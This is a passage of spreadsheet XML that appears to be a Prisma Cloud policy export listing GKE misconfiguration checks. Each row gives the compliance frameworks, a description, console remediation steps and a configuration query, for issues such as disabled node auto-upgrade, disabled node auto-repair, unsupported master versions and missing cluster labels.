https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-2-19</t>
        </is>
      </c>
      <c r="Y2875" t="inlineStr"/>
      <c r="Z2875" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule =  'enableKubernetesAlpha is true'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2875" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2875" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2875" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-362-CKV2_GCP_19</t>
        </is>
      </c>
      <c r="AD2875" t="b">
        <v>1</v>
      </c>
      <c r="AE2875" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2875" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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5" t="inlineStr">
        <is>
          <t>d49d0b8f-790f-412c-b59f-9ccdd0bca8f8</t>
        </is>
      </c>
      <c r="AI2875" t="inlineStr">
        <is>
          <t>7153b3ac-dc68-4f88-a981-db2992b81a80</t>
        </is>
      </c>
      <c r="AJ2875" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2875" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2876">
      <c r="A2876" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Sarbanes Oxley Act (SOX), TX-RAMP Level 1, APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight, Secure Controls Framework (SCF) - 2022.2.1, NYDFS 23 CRR-NY 500.0, APRA (CPS 234) Information Security, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, FFIEC, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CIS v1.5.0 (GKE) - Level 1, DORA, CIS v1.4.0 (GKE) - Level 1, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, ISO 27002:2022, kfirdaus AWS Account-CS, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, PCI DSS v3.2.1, tadenugba Copy of CIS v1.1.0 (GKE), ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), Copy of CIS Controls v8, CIS v1.2.0 (GKE), APRA (CPS 234) Information Security, CIS Controls v8, NIST SP 800-171 Revision 2, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST SP 800-172, CIS Controls v7.1, CIS v1.1.0 (GKE), CIS Controls v7.1, RBI Baseline Cyber Security and Resilience Requirements, CIS Controls v8.1, Brazilian Data Protection Law (LGPD), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, CIS v1.3.0 (GKE) - Level 1, NIST CSF, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v8.1</t>
        </is>
      </c>
      <c r="B2876" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2876" s="2" t="inlineStr"/>
      <c r="D2876" t="inlineStr"/>
      <c r="E2876" t="inlineStr"/>
      <c r="F2876" t="inlineStr"/>
      <c r="G2876" t="b">
        <v>1</v>
      </c>
      <c r="H28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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2876" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2876" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster node auto-upgrade configuration disabled</t>
        </is>
      </c>
      <c r="L2876" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2876" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2876" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2876" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2876" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2876" t="inlineStr">
        <is>
          <t>CIS Control 7</t>
        </is>
      </c>
      <c r="R2876" t="inlineStr">
        <is>
          <t>7.4</t>
        </is>
      </c>
      <c r="S2876" t="inlineStr"/>
      <c r="T2876" t="b">
        <v>0</v>
      </c>
      <c r="U2876" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2876" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2876" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes cluster nodes with auto-upgrade configuration disabled. Node auto-upgrades help you keep the nodes in your cluster up to date with the cluster master version when your master is updated on your behalf. When you create a new cluster using Google Cloud Platform Console, node auto-upgrade is enabled by default.
FMI: https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-upgrades</t>
        </is>
      </c>
      <c r="X2876" t="inlineStr">
        <is>
          <t>1. Log in to Google cloud console
2. Navigate to Google Kubernetes Engine, click on 'Clusters' to get the list
3. Click on the alerted cluster and go to section 'Node pools'
4. Click on a node pool to ensure 'Auto-upgrade' is enabled in the 'Management' section
5. To modify click on the 'Edit' button at the top
6. To enable the configuration click on the check box against 'Enable auto-upgrade'
7. Click on 'Save'
8. Repeat Step 4-7 for each node pool associated with the reported cluster 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-5</t>
        </is>
      </c>
      <c r="Y2876" t="inlineStr"/>
      <c r="Z2876" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = nodePools[?any(management.autoUpgrade does not exist or management.autoUpgrade is false)] exists
{"category":"Kubernetes","resourceTypes":["google_container_node_pool"]}</t>
        </is>
      </c>
      <c r="AA2876" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2876" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2876" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-565-CKV_GCP_10</t>
        </is>
      </c>
      <c r="AD2876" t="b">
        <v>1</v>
      </c>
      <c r="AE2876" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2876" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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6" t="inlineStr">
        <is>
          <t>f70918b1-7c19-4de6-b851-967bea5648ba</t>
        </is>
      </c>
      <c r="AI2876" t="inlineStr">
        <is>
          <t>ee11eb8a-a8a1-4703-980c-940057b84f24</t>
        </is>
      </c>
      <c r="AJ2876" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2876" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2877">
      <c r="A2877" t="inlineStr">
        <is>
          <t>Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v4.0.12, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CRI Profile v1.2.1, NIST CSF v2.0, NIST SP 800-172, CIS Controls v8, ACSC Information Security Manual (ISM), ISO/IEC 27017:2015, Australian Cyber Security Centre (ACSC) Essential Eight, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS Controls v7.1, Copy of ACSC Information Security Manual (ISM)-clone, CIS Controls v8.1, FFIEC, Copy of CIS Controls v8, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, CSA CCM v.4.0.6, CSA CCM v.4.0.6, PCI DSS v4.0, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v.4.0.6, CRI Profile v2.0, DORA, Secure Controls Framework (SCF) - 2024.2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev 5, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CRI Profile v1.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST SP 800-171 Revision 3, ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CSA CCM v.4.0.1, Copy of CIS Controls v8, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS Controls v8, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27001:2022, kashan ACSC Information Security Manual (ISM), New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, FFIEC, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), TX-RAMP Level 1, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, HITRUST v.9.4.2 [Deprecated], CIS Controls v7.1, NIST CSF v2.0, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CIS Controls v8.1, PCI DSS v4.0, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, RBI Baseline Cyber Security and Resilience Requirements, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements</t>
        </is>
      </c>
      <c r="B2877" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2877" s="2" t="inlineStr"/>
      <c r="D2877" t="inlineStr"/>
      <c r="E2877" t="inlineStr"/>
      <c r="F2877" t="inlineStr"/>
      <c r="G2877" t="b">
        <v>1</v>
      </c>
      <c r="H28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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2877" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2877" t="inlineStr">
        <is>
          <t>GCP GKE unsupported Master node version</t>
        </is>
      </c>
      <c r="L2877" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2877" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2877" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2877" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2877" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2877" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2877" t="inlineStr">
        <is>
          <t>ISM-1407</t>
        </is>
      </c>
      <c r="S2877" t="inlineStr"/>
      <c r="T2877" t="b">
        <v>0</v>
      </c>
      <c r="U2877" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2877" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2877" t="inlineStr">
        <is>
          <t>This policy identifies the GKE master node version and generates an alert if the version running is unsupported.
Using an unsupported version of Google Kubernetes Engine (GKE) on Google Cloud Platform (GCP) can lead to several potential issues and risks, such as security vulnerabilities, compatibility issues, performance and stability problems, and compliance concerns. To mitigate these risks, it's crucial to regularly update the GKE clusters to supported versions recommended by Google Cloud.
As a security best practice, it is always recommended to use the latest version of GKE.
Note: This Policy is in line with the GCP GKE release version schedule https://cloud.google.com/kubernetes-engine/docs/release-schedule#schedule-for-release-channels</t>
        </is>
      </c>
      <c r="X2877" t="inlineStr">
        <is>
          <t>Manually initiate a master upgrade:
1. Visit the Google Kubernetes Engine Clusters menu in Google Cloud Platform Console.
2. Click the desired cluster name.
3. Under Cluster basics, click "Upgrade Available" next to Version.
4. Select the desired version, then click Save Changes.</t>
        </is>
      </c>
      <c r="Y2877" t="inlineStr"/>
      <c r="Z2877" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = NOT ( currentMasterVersion starts with "1.27." or currentMasterVersion starts with "1.28." or currentMasterVersion starts with "1.29." or currentMasterVersion starts with "1.30." or currentMasterVersion starts with "1.31." )</t>
        </is>
      </c>
      <c r="AA2877" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2877" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2877" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-397</t>
        </is>
      </c>
      <c r="AD2877" t="b">
        <v>1</v>
      </c>
      <c r="AE2877" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2877" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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7" t="inlineStr">
        <is>
          <t>57aeebc5-ac6c-4ec2-8735-3a29863336a5</t>
        </is>
      </c>
      <c r="AI2877" t="inlineStr">
        <is>
          <t>2a4de97b-446b-48ed-ab50-01446cecc676</t>
        </is>
      </c>
      <c r="AJ2877" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2877" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2878">
      <c r="A2878" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.1.02, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, APRA (CPS 234) Information Security, FFIEC, Brazilian Data Protection Law (LGPD), Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.6, CIS Controls v8, CIS v1.5.0 (GKE) - Level 1, RBI Baseline Cyber Security and Resilience Requirements, tadenugba Copy of CIS v1.1.0 (GKE), ISO 27002:2022, PCI DSS v3.2.1, CIS Controls v8.1, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, CRI Profile v1.2.1, CRI Profile v2.0, APRA (CPS 234) Information Security, CIS Controls v7.1, CIS v1.2.0 (GKE), NIST CSF v2.0, NIST SP 800-171 Revision 2, HITRUST v.9.4.2 [Deprecated], CIS v1.4.0 (GKE) - Level 1, CIS v1.1.0 (GKE), NIST SP 800-172, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, ACSC Information Security Manual (ISM), PCI DSS v4.0, NIST CSF, CIS v1.3.0 (GKE) - Level 1, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2878" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2878" s="2" t="inlineStr"/>
      <c r="D2878" t="inlineStr"/>
      <c r="E2878" t="inlineStr"/>
      <c r="F2878" t="inlineStr"/>
      <c r="G2878" t="b">
        <v>1</v>
      </c>
      <c r="H28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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2878" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2878" t="inlineStr">
        <is>
          <t>GCP Kubernetes cluster node auto-repair configuration disabled</t>
        </is>
      </c>
      <c r="L2878" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2878" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2878" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2878" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2878" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2878" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2878" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2878" t="inlineStr"/>
      <c r="T2878" t="b">
        <v>0</v>
      </c>
      <c r="U2878" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2878" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2878" t="inlineStr">
        <is>
          <t>This policy identifies GCP Kubernetes cluster nodes with auto-repair configuration disabled. GKE's node auto-repair feature helps you keep the nodes in your cluster in a healthy, running state. When enabled, GKE makes periodic checks on the health state of each node in your cluster. If a node fails consecutive health checks over an extended time period, GKE initiates a repair process for that node.
FMI: https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-repair</t>
        </is>
      </c>
      <c r="X2878" t="inlineStr">
        <is>
          <t>1. Log in to Google cloud console
2. Navigate to Google Kubernetes Engine, click on 'Clusters' to get the list
3. Click on the alerted cluster and go to section 'Node pools'
4. Click on a node pool to ensure Auto repair' is enabled in the 'Management' section
5. To modify click on the 'Edit' button at the top
6. To enable the configuration click on the check box against 'Enable auto-repair'
7. Click on 'Save'
8. Repeat Step 4-7 for each node pool associated with the reported cluster 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-4</t>
        </is>
      </c>
      <c r="Y2878" t="inlineStr"/>
      <c r="Z2878" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = nodePools[?any(management.autoRepair does not exist or management.autoRepair is false)] exists
{"category":"Kubernetes","resourceTypes":["google_container_node_pool"]}</t>
        </is>
      </c>
      <c r="AA2878" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2878" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2878" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-564-CKV_GCP_9</t>
        </is>
      </c>
      <c r="AD2878" t="b">
        <v>1</v>
      </c>
      <c r="AE2878" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2878" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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8" t="inlineStr">
        <is>
          <t>0e72ff6d-9d6e-4fa1-8c3b-b815b9e4d459</t>
        </is>
      </c>
      <c r="AI2878" t="inlineStr">
        <is>
          <t>6769e686-5e96-4f67-8985-2646f9d90f1b</t>
        </is>
      </c>
      <c r="AJ2878" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2878" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2879">
      <c r="A2879" t="inlineStr">
        <is>
          <t>CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v3.0.1, APRA (CPS 234) Information Security, CSA CCM v3.0.1, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, Copy of CIS Controls v8, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST 800-53 Rev4, NIST CSF, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CIS v1.0.0 (GCP), ISO/IEC 27001:2022, NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, CSA CCM v3.0.1, CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v3.0.1, CSA CCM v.4.0.1, CSA CCM v3.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2879" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2879" s="2" t="inlineStr"/>
      <c r="D2879" t="inlineStr"/>
      <c r="E2879" t="inlineStr"/>
      <c r="F2879" t="inlineStr"/>
      <c r="G2879" t="b">
        <v>1</v>
      </c>
      <c r="H28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79" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2879" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2879" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters without any label information</t>
        </is>
      </c>
      <c r="L2879" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2879" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2879" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2879" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2879" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2879" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2879" t="inlineStr">
        <is>
          <t>ISM-1409</t>
        </is>
      </c>
      <c r="S2879" t="inlineStr"/>
      <c r="T2879" t="b">
        <v>0</v>
      </c>
      <c r="U2879" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2879" t="inlineStr">
        <is>
          <t>gcloud-container-describe-clusters</t>
        </is>
      </c>
      <c r="W2879" t="inlineStr">
        <is>
          <t>This policy identifies all Kubernetes Engine Clusters which do not have labels. Having a cluster label helps you identify and categorize Kubernetes clusters.</t>
        </is>
      </c>
      <c r="X2879" t="inlineStr">
        <is>
          <t>1. Login to GCP Portal
2. Go to Kubernetes Engine (Left Panel)
3. Select Kubernetes clusters 
4. From the list of clusters, choose the reported cluster
5. Click on 'SHOW INFO PANEL' button
6. Click on 'Add Label'
7. Specify customized data for Key and Value
8. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-kubernetes-policies/bc-gcp-kubernetes-13</t>
        </is>
      </c>
      <c r="Y2879" t="inlineStr"/>
      <c r="Z2879" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-container-describe-clusters' AND json.rule = 'resourceLabels does not exist or resourceLabels.[*] is empty'
{"category":"Kubernetes","resourceTypes":["google_container_cluster"]}</t>
        </is>
      </c>
      <c r="AA2879" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2879" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2879" t="inlineStr">
        <is>
          <t>PC-GCP-GKE-146-CKV_GCP_21</t>
        </is>
      </c>
      <c r="AD2879" t="b">
        <v>1</v>
      </c>
      <c r="AE2879" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2879" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG28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79" t="inlineStr">
        <is>
          <t>1a4127c1-6acd-4aca-9010-4eaa776e3ee0</t>
        </is>
      </c>
      <c r="AI2879" t="inlineStr">
        <is>
          <t>689395b5-12d8-47c1-84a9-85881663f3fc</t>
        </is>
      </c>
      <c r="AJ2879" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2879" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2880">
      <c r="A2880" t="inlineStr">
        <is>
          <t>Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, ISO/IEC 27017:2015, CIS v1.2.0 (GKE), APRA (CPS 234) Information Security, PCI DSS v4.0, ISO 27002:2022, HIPAA, FFIEC, PCI DSS v4.0, CDC NIST 800-53 Rev4, ISO 27002:2022, ISO/IEC 27017:2015, FFIEC, PCI DSS v3.2.1, ACSC Information Security Manual (ISM), CSA CCM v4.0.12, CIS v1.3.0 (GKE) - Level 1, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.6, Microsoft Cloud Security Benchmark v1, APRA (CPS 234) Information Security, ISO/IEC 27001:2022, FFIEC, Copy of CIS Controls v8, ISO 27002:2022, CIS Controls v8.1, CSA CCM v.4.0.6, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 2, PCI DSS v4.0, HITRUST CSF v.11.2.0, ISO/IEC 27017:2015, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, CIS v1.4.0 (GKE) - Level 1, ITSG-33, NIST 800-53 Rev4, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, NIST CSF, PCI DSS v4.0, CIS Controls v7.1, ISO/IEC 27017:2015, GDPR, RBI Baseline Cyber Security and Resilience Requirements, PCI DSS v4.0, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v.4.0.1, PCI DSS v4.0, ISO/IEC 27002:2013, TX-RAMP Level 2, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27017:2015, CRI Profile v1.2.1, CSA CCM v.4.0.1, CIS v1.1.0 (GKE), ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, CSA CCM v.4.0.1, SOC 2, Australian Cyber Security Centre (ACSC) Essential Eight, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.1.02, FFIEC, HIPAA, Secure Controls Framework (SCF) - 2024.2, HIPAA, APRA (CPS 234) Information Security, SOC 2, ITSG-33, tadenugba Copy of CIS v1.1.0 (GKE), CSA CCM v4.0.12, ISO/IEC 27001:2022, ISO/IEC 27001:2022, ITSG-33, ISO 27002:2022, ISO 27001:2013, CIS Controls v8, NIST SP 800-172, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, CRI Profile v2.0, NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST SP 800-171 Revision 2, Brazilian Data Protection Law (LGPD), CIS v1.5.0 (GKE) - Level 1, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.0.0 (GCP)</t>
        </is>
      </c>
      <c r="B2880" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2880" s="2" t="inlineStr"/>
      <c r="D2880" t="inlineStr"/>
      <c r="E2880" t="inlineStr"/>
      <c r="F2880" t="inlineStr"/>
      <c r="G2880" t="b">
        <v>1</v>
      </c>
      <c r="H28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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2880" t="inlineStr">
        <is>
          <t>gcloud-container</t>
        </is>
      </c>
      <c r="K2880" t="inlineStr">
        <is>
          <t>GCP Kubernetes Engine Clusters have Legacy Authorization enabled</t>
        </is>
      </c>
      <c r="L2880" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2880" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2880" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2880" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2880" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2880" t="inlineStr">
        <is>
          <t>Guidelines for System Hardening</t>
        </is>
      </c>
      <c r="R2880" t="inlineStr">
        <is>
          <t>ISM-1603</t>
        </is>
      </c>
      <c r="S2880" t="inlineStr"/>
      <c r="T2880" t="b">
        <v>0</v>
      </c>
